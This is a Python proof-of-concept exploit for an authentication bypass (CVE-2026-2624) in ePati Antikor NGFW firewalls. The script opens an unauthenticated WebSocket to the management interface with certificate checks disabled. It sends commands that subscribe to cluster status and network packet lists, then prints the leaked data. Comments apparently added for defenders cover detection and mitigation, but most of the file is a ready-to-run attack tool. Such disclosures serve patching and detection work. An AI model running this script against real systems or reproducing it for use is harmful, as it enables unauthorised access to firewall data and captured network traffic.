# Exploit Title: ePati Antikor NGFW 2.0.1301 - Authentication Bypass
# Date: 2026-04-13
# Exploit Author: [SADIK ERTÜRK]
# Vendor Homepage: https://www.epati.com.tr/
# Software Link: https://www.epati.com.tr/antikor-ngfw/
# Version: v.2.0.1298 - v.2.0.1301
# Tested on: Linux / Antikor OS
# CVE: CVE-2026-2624
import websocket
import json
import ssl
import sys
import argparse
import random
import string
import time
def banner():
    """Print the tool banner: title and CVE/author line framed by two rules."""
    rule = "-" * 65
    banner_lines = (
        rule,
        " ePati Antikor NGFW Unauthenticated WebSocket Exploit",
        " CVE-2026-2624 | Author: [SADIK ERTÜRK]",
        rule,
    )
    for text in banner_lines:
        print(text)
def generate_random_id(length=8):
    """Return a random lowercase-alphanumeric string of ``length`` characters.

    The result fills the session segment of the SockJS URL path. It comes
    from the ``random`` module, so it is an arbitrary identifier, not a secret.
    """
    alphabet = string.ascii_lowercase + string.digits
    picked = random.choices(alphabet, k=length)
    return "".join(picked)
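def exploit(target_ip, target_port):
    """Check whether the SockJS WebSocket endpoint answers without a login.

    Opens ``wss://<target>:<port>/sock/<server_id>/<session_id>/websocket``
    with no credentials, sends the ``rapor-dinle`` (report listen) command
    for ``cluster-durum`` (cluster status) and then ``paket-liste-dinle``
    (packet list listen), and prints the first frame received after each.

    Defender notes:
      * The file header lists v.2.0.1298 - v.2.0.1301 as affected, and the
        error message below implies v.2.0.1302+ is fixed. Confirm this
        against the vendor advisory before relying on it.
      * The path IDs are random on every run (3-digit server ID, 8-character
        lowercase-alphanumeric session ID), so detection should match the
        ``/sock/<id>/<id>/websocket`` path shape and the ``komut`` values
        above coming from clients with no authenticated session, not fixed
        strings.
      * Limiting who can reach the management port reduces exposure until
        the appliance is upgraded.

    Args:
        target_ip: Host name or IP address of the appliance.
        target_port: TCP port of the web interface.

    Raises:
        SystemExit: With status 1 when the connection or exchange fails.
    """
    # Random server and session IDs fill the two SockJS path segments.
    server_id = random.randint(100, 999)
    session_id = generate_random_id()
    ws_url = f"wss://{target_ip}:{target_port}/sock/{server_id}/{session_id}/websocket"
    print(f"[*] Target WebSocket URL created: {ws_url}")
    print("[*] Connecting to the target... (Ignoring SSL certificate warnings)")
    ws = None
    try:
        # Certificate verification is switched off so self-signed appliance
        # certificates are accepted. The peer's identity is therefore NOT
        # verified and the output is only as trustworthy as the network path.
        ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE})
        ws.connect(ws_url)
        # NOTE(review): reaching this line only proves the WebSocket handshake
        # completed; it is not by itself evidence that a command was accepted.
        print("[+] Connection Successful! (Authentication bypassed)\n")
        # Payload 1: Listening to Cluster and System Status
        payload_1 = json.dumps(["{\"istekId\":\"req_init_01\",\"komut\":\"rapor-dinle\",\"parametreler\":[\"cluster-durum\"]}"])
        print("[*] Sending 1st payload: 'rapor-dinle' (cluster-status)...")
        ws.send(payload_1)
        # Give the server a moment to answer before reading one frame.
        time.sleep(1)
        response_1 = ws.recv()
        # NOTE(review): any non-empty frame is reported as a leak; the content
        # is not inspected, so a protocol control frame would also count.
        # Read the printed frame before concluding a host is vulnerable.
        if response_1:
            print("[+] SUCCESSFUL! Sensitive system data successfully leaked:")
            print(f"> {response_1}\n")
        # Payload 2: Listening to Network Packets
        payload_2 = json.dumps(["{\"istekId\":\"req_101\",\"komut\":\"paket-liste-dinle\",\"parametreler\":[]}"])
        print("[*] Sending 2nd payload: 'paket-liste-dinle' (network-packet-list)...")
        ws.send(payload_2)
        time.sleep(1)
        response_2 = ws.recv()
        if response_2:
            print("[+] Network packet data captured:")
            print(f"> {response_2}\n")
        print("[*] Exploitation complete. Closing connection.")
        ws.close()
    except websocket.WebSocketException as e:
        print(f"[-] WebSocket Error: {e}")
        print("[-] The target might be patched (v.2.0.1302+) or the port is closed.")
        sys.exit(1)
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")
        sys.exit(1)
    finally:
        # The original closed the socket only on the success path; release it
        # on the error paths too. Best effort: the outcome is already reported.
        if ws is not None and ws.connected:
            try:
                ws.close()
            except Exception:
                pass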
if __name__ == "__main__":
    banner()

    # Command-line interface: the target is mandatory, the port is optional.
    cli = argparse.ArgumentParser(
        description="ePati Antikor NGFW WebSocket Auth Bypass PoC"
    )
    cli.add_argument(
        "-t",
        "--target",
        required=True,
        help="Target IP or Hostname (e.g., 192.168.1.10)",
    )
    cli.add_argument(
        "-p",
        "--port",
        default="8800",
        help="Target Port (Default: 8800)",
    )
    options = cli.parse_args()

    # The port stays a string; it is only interpolated into the URL.
    exploit(options.target, options.port)